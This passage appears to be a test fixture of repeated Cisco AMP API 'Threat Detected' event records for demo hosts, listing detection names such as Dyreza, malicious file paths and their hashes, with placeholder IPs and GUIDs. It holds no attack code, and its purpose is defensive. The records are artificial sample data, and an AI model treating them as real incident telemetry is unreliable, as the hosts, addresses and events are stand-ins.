Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258826728112214","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251202912551000,"timestamp":1610705786,"timestamp_nanoseconds":262000000,"date":"2021-01-15T10:16:26+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251202912550913","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\Windows\\System32\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258706469028000,"timestamp":1610705770,"timestamp_nanoseconds":292000000,"date":"2021-01-15T10:16:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258706469027925","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258680699224000,"timestamp":1610705764,"timestamp_nanoseconds":286000000,"date":"2021-01-15T10:16:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258680699224148","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668365670547000,"timestamp":1610705756,"timestamp_nanoseconds":428000000,"date":"2021-01-15T10:15:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668365670547487","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668365670547000,"timestamp":1610705756,"timestamp_nanoseconds":39000000,"date":"2021-01-15T10:15:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668365670547486","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668365670547000,"timestamp":1610705756,"timestamp_nanoseconds":9000000,"date":"2021-01-15T10:15:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668361375580189","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668361375580000,"timestamp":1610705755,"timestamp_nanoseconds":616000000,"date":"2021-01-15T10:15:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668361375580188","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258629159617000,"timestamp":1610705752,"timestamp_nanoseconds":649000000,"date":"2021-01-15T10:15:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258629159616595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258577620009000,"timestamp":1610705740,"timestamp_nanoseconds":637000000,"date":"2021-01-15T10:15:40+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258577620009042","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258526080401000,"timestamp":1610705728,"timestamp_nanoseconds":609000000,"date":"2021-01-15T10:15:28+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258526080401489","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258474540794000,"timestamp":1610705716,"timestamp_nanoseconds":987000000,"date":"2021-01-15T10:15:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258474540793936","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258423001186000,"timestamp":1610705704,"timestamp_nanoseconds":959000000,"date":"2021-01-15T10:15:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258423001186383","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":470000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542427","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":112000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":71000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542425","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668099382575000,"timestamp":1610705694,"timestamp_nanoseconds":696000000,"date":"2021-01-15T10:14:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668099382575128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258371461579000,"timestamp":1610705692,"timestamp_nanoseconds":947000000,"date":"2021-01-15T10:14:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258371461578830","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258324216938000,"timestamp":1610705681,"timestamp_nanoseconds":403000000,"date":"2021-01-15T10:14:41+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258324216938573","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258272677331000,"timestamp":1610705669,"timestamp_nanoseconds":298000000,"date":"2021-01-15T10:14:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258272677331020","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258221137723000,"timestamp":1610705657,"timestamp_nanoseconds":270000000,"date":"2021-01-15T10:14:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258221137723467","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258169598116000,"timestamp":1610705645,"timestamp_nanoseconds":648000000,"date":"2021-01-15T10:14:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258169598115914","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":532000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat 